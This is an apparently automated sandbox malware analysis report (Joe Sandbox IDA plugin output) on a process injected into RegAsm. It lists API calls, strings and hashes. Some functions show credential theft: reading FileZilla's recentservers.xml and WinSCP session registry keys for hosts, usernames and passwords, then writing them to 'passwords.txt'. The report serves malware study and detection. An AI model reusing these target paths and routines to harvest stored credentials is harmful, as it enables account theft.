GetProcessHeap.KERNEL32(00000000,?,?,00404426,?,?,?,?,?,?,?,?,00000000), ref: 00411BC5
HeapAlloc.KERNEL32(00000000,?,00404426,?,?,?,?,?,?,?,?,00000000), ref: 00411BCC

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocBinaryCryptProcessString
String ID:
API String ID: 1871034439-0
Opcode ID: 79c2337f4b38eefda7e9274680465812c3427f4f6a7efff84eead5125c2ca132
Instruction ID: 8208f6122bf114f306faf3b204c21700a5568cc7c8706a5a72bce6b0b3e9b5ab
Opcode Fuzzy Hash: 79c2337f4b38eefda7e9274680465812c3427f4f6a7efff84eead5125c2ca132
Instruction Fuzzy Hash: DB018C75500218BFDF118F61DC448EB7BBEFF8A355B204429FA0193220E7359D91EBA0

Function 1B743770 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction ID: 69ae3ed06c459cd4e8b80e4781908d35ccdba0647345bfe1e769a6f96519f59c
Opcode Fuzzy Hash: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction Fuzzy Hash: 6AE0B6BA006700EBCE225F52DE47E9BBFB6BF58710F040C58F5C521670C772A860AB45

Function 1B7637E0 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
Instruction ID: 42323df1dd00b358854c3eaaba2381d969d7495569ee1063eb2db51f49abf9a0
Opcode Fuzzy Hash: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
Instruction Fuzzy Hash: 57E0B6BA006780EBCF225F52DC46E9BBFB6AF58314F040C58F58561470C7B2A8A1AB45

Function 1B725910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 1B72597E

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
API String ID: 0-143322027
Opcode ID: 2459a67ea006460db55a43a0d7751cea67073df04b217523b4d3e0ede8ac3c84
Instruction ID: 324632bdd935157cdadcf519e6928c09a85c00fec8c22f205fbda1b4a3bf1221
Opcode Fuzzy Hash: 2459a67ea006460db55a43a0d7751cea67073df04b217523b4d3e0ede8ac3c84
Instruction Fuzzy Hash: 6811ACB5500206BFDB109F59CC85FC6BBADFF05314F404145FA089B252C3B2B5A4CBA0

Function 1B6B8970 Relevance: 4.6, APIs: 3, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 365e98d430c87eccbd46df5737cc328fa7e98f509f05211116eb17c27edf3de4
Instruction ID: ca103579c908b439459d460e17eea5f138bed562b05659c9ed1c056d37bb1694
Opcode Fuzzy Hash: 365e98d430c87eccbd46df5737cc328fa7e98f509f05211116eb17c27edf3de4
Instruction Fuzzy Hash: 264139B6604211AFCB019F18EC408EBB7B5EFA4620F044669F45487261D733DC52DB91

Function 1B73D3B0 Relevance: 4.6, APIs: 3, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7286b3828e7d72b752460e88ff9e47ba6d4473a46131ab91c3d1636473b80c0f
Instruction ID: 06eedc94c57180c244430b7315bbced1c9b26e107ecb9416ddb0b8175beab854
Opcode Fuzzy Hash: 7286b3828e7d72b752460e88ff9e47ba6d4473a46131ab91c3d1636473b80c0f
Instruction Fuzzy Hash: 293181B5600201AFEB44DF69EC85EAAB3E9FF58615F008529F949C3252E771F910CBA1

Function 1B7255B0 Relevance: 4.6, APIs: 3, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975c929e29e90f9755af7133ac2a266940bbe302df66bb0064f95d7808e488b7
Instruction ID: 2d7b8fe24c5454afe0e5fa49fabf0ee7e3c974913343dce88678d0bafd9485c0
Opcode Fuzzy Hash: 975c929e29e90f9755af7133ac2a266940bbe302df66bb0064f95d7808e488b7
Instruction Fuzzy Hash: 0431BEB5500301AFEF148F2ADC85BABB7E9EF84B54F504869F8478B291E771E850CB51

Function 0040EF81 Relevance: 93.4, APIs: 62, Instructions: 416memorystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040EF86

Part of subcall function 0040EE86: _EH_prolog.MSVCRT ref: 0040EE8B
Part of subcall function 0040EE86: lstrlenA.KERNEL32(?,6CA87FA0,750A5460,00000000), ref: 0040EEAF
Part of subcall function 0040EE86: strchr.MSVCRT ref: 0040EEC1

GetProcessHeap.KERNEL32(00000008,?,?,6CA87FA0,00000000), ref: 0040EFD5
HeapAlloc.KERNEL32(00000000,?,6CA87FA0,00000000), ref: 0040EFDC
GetProcessHeap.KERNEL32(00000000,?,?,6CA87FA0,00000000), ref: 0040EFF1
HeapFree.KERNEL32(00000000,?,6CA87FA0,00000000), ref: 0040EFF8
strcpy_s.MSVCRT ref: 0040F031
GetProcessHeap.KERNEL32(00000000,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F048
HeapFree.KERNEL32(00000000,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F04F
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F075
HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F07C
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F083
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F08A
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F09F
HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F0A6
strcpy_s.MSVCRT ref: 0040F0B9
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F0CA
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F0D1
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0), ref: 0040F0EC
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F0F3
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0), ref: 0040F0FA
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F101
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0), ref: 0040F116
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F11D
strcpy_s.MSVCRT ref: 0040F130
GetProcessHeap.KERNEL32(00000000,?), ref: 0040F141
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,750A5460), ref: 0040F148
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F16A
HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F171
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F178
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F17F
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F197
HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F19E
strcpy_s.MSVCRT ref: 0040F1B1
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F1C2
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F1C9

Part of subcall function 0040EDD8: strlen.MSVCRT ref: 0040EDEF

lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F1D2
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F1E2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F1E9
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F215
strcpy_s.MSVCRT ref: 0040F239
GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,00000001,00000000,?,?,00000000), ref: 0040F262
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F269
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F26E
GetProcessHeap.KERNEL32(00000008,00000001,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F279
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F280
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F291
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CA87FA0,00000000), ref: 0040F298
strcpy_s.MSVCRT ref: 0040F2A6
GetProcessHeap.KERNEL32(00000000,?), ref: 0040F2B2
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,750A5460), ref: 0040F2B9
GetProcessHeap.KERNEL32(00000000,?), ref: 0040F2DF
HeapFree.KERNEL32(00000000), ref: 0040F2E6
GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040F2ED
HeapAlloc.KERNEL32(00000000), ref: 0040F2F4
strcpy_s.MSVCRT ref: 0040F30C
GetProcessHeap.KERNEL32(00000000,?), ref: 0040F31D
HeapFree.KERNEL32(00000000), ref: 0040F324
strlen.MSVCRT ref: 0040F372
GetProcessHeap.KERNEL32(00000000,?), ref: 0040F3B6
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,750A5460), ref: 0040F3BD

Part of subcall function 0040EE86: strchr.MSVCRT ref: 0040EEE5
Part of subcall function 0040EE86: lstrlenA.KERNEL32(?), ref: 0040EF03
Part of subcall function 0040EE86: GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040EF10
Part of subcall function 0040EE86: HeapAlloc.KERNEL32(00000000), ref: 0040EF17
Part of subcall function 0040EE86: strcpy_s.MSVCRT ref: 0040EF52

GetProcessHeap.KERNEL32(00000000,?), ref: 0040F409
HeapFree.KERNEL32(00000000), ref: 0040F410

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$H_prologstrchrstrlen
String ID:
API String ID: 2599614518-0
Opcode ID: ae879d77a672600910af0cff755b704dd1f8243dd716ba1ff70db9919d7879d5
Instruction ID: b1bcedb0f62315078290495aff4db1c8677b25131678ed98aef8cb3aae5a226f
Opcode Fuzzy Hash: ae879d77a672600910af0cff755b704dd1f8243dd716ba1ff70db9919d7879d5
Instruction Fuzzy Hash: 7BE128B1C00219ABCF10AFE1DD499EEBB79FB09304F10483AF606B6291DB794A54DB65

Function 0040C86E Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 370stringmemoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040C873

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00411B09: SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 00411B55: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413F3B,00000000,00000000), ref: 00411B6E

strtok_s.MSVCRT ref: 0040C951
GetProcessHeap.KERNEL32(00000000,000F423F,00426CF2,00426CEF,00426CEE,00426CEB), ref: 0040C9A5
HeapAlloc.KERNEL32(00000000), ref: 0040C9AC
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040C9C0
lstrlenA.KERNEL32(00000000), ref: 0040C9CB
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CA03
lstrlenA.KERNEL32(00000000), ref: 0040CA0E
StrStrA.SHLWAPI(00000000,<User>), ref: 0040CA4C
lstrlenA.KERNEL32(00000000), ref: 0040CA57
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CA95
lstrlenA.KERNEL32(00000000), ref: 0040CAA4
lstrlenA.KERNEL32(?), ref: 0040CC9F

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918

memset.MSVCRT ref: 0040CCF2

Strings

Soft: FileZilla, xrefs: 0040CB87
Host: , xrefs: 0040CB95
Password: , xrefs: 0040CC11
<Host>, xrefs: 0040C9BA
passwords.txt, xrefs: 0040CCB1
<Port>, xrefs: 0040C9FD
<User>, xrefs: 0040CA46
Login: , xrefs: 0040CBE3
<Pass encoding="base64">, xrefs: 0040CA8F
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040C8E0

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 486015307-935134978
Opcode ID: 5ced818158ca7a55433ed9b2822ddbf731028b9e2dee3b4240ec5cd35ba65ed1
Instruction ID: f6fda4509a15e87aaadaa82135121b64b41e625f269fd3aaebbcf0f1521a0504
Opcode Fuzzy Hash: 5ced818158ca7a55433ed9b2822ddbf731028b9e2dee3b4240ec5cd35ba65ed1
Instruction Fuzzy Hash: 65E19131900158EADB05FBE1DD4AEEEBB78AF15304F50405AF515B21D2EFB81AC8CB69

Function 0040F43A Relevance: 63.4, APIs: 22, Strings: 14, Instructions: 411registryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040F43F
memset.MSVCRT ref: 0040F468
memset.MSVCRT ref: 0040F488
memset.MSVCRT ref: 0040F49C
memset.MSVCRT ref: 0040F4B0
memset.MSVCRT ref: 0040F4BF
memset.MSVCRT ref: 0040F4CD
memset.MSVCRT ref: 0040F4DE
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040F506
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040F52E
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040F575
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040F592
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00426CE6), ref: 0040F624
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040F676

Strings

Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0040F56B
Password, xrefs: 0040F7B4
Password: , xrefs: 0040F7C5
Security, xrefs: 0040F526
UserName, xrefs: 0040F733
Soft: WinSCP, xrefs: 0040F5AD
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040F4F3
:22, xrefs: 0040F6C5
Host: , xrefs: 0040F5D7
HostName, xrefs: 0040F615
PortNumber, xrefs: 0040F660
UseMasterPassword, xrefs: 0040F521
Login: , xrefs: 0040F6F5
passwords.txt, xrefs: 0040F90A

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
